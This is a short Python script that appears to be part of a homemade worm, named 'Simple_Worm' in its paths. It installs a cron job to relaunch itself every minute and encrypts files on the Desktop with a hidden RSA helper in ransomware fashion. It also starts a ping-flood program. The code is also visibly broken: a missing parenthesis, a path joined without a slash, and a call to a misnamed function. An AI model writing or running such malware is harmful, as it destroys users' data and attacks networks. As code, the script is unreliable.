#!/usr/bin/env python3
import os
from subprocess import Popen, PIPE
from crontab import CronTab
import sys

def Crontab():
    if os.path.exists('/home/attacker/Public/.Simple_Worm/trigger'):
        exe = '/home/attacker/Public/.Simple_Worm/trigger'
    elif os.path.exists('/home/attacker/Desktop/.Backup/trigger'):
        exe = '/home/attacker/Desktop/.Backup/trigger'
    cron = CronTab(user = 'attacker')
    job = cron.new(command = exe)
    job.minute.every(1)
    cron.write()

def RSA():
    exe = ''
    if os.path.exists('/home/attacker/Public/.Simple_Worm/RSA_Encrypt'):
        exe = '/home/attacker/Public/.Simple_Worm/RSA_Encrypt'
    elif os.path.exists('/home/attacker/Desktop/.Backup/RSA_Encrypt'):
        exe = '/home/attacker/Desktop/.Backup/RSA_Encrypt'
    
    path = '/home/attacker/Desktop'
    desktop = os.listdir(path)
    for d in desktop:
        try:
            [int(i) for i in open(path + d).read().split(' ')]
        except:
            os.system('{} -C 126419 30743 {}'.format(exe, path + d)

def PingFlooding():
    p1 = Popen(['ps', '-aux'], stdout=PIPE)
    p2 = Popen(['grep', 'Loop_ping'], stdin=p1.stdout, stdout=PIPE)
    p1.stdout.close()
    output = p2.communicate()[0]
    if output == b'':
        if os.path.exists('/home/attacker/Public/.Simple_Worm/Loop_ping'):
            os.system('/home/attacker/Public/.Simple_Worm/Loop_ping')
        elif os.path.exists('/home/attacker/Desktop/.Backup/Loop_ping'):
            os.system('/home/attacker/Desktop/.Backup/Loop_ping')

if sys.argv[1] == 'cron':
    CronTab()
else:
    RSA()
    PingFlooding()
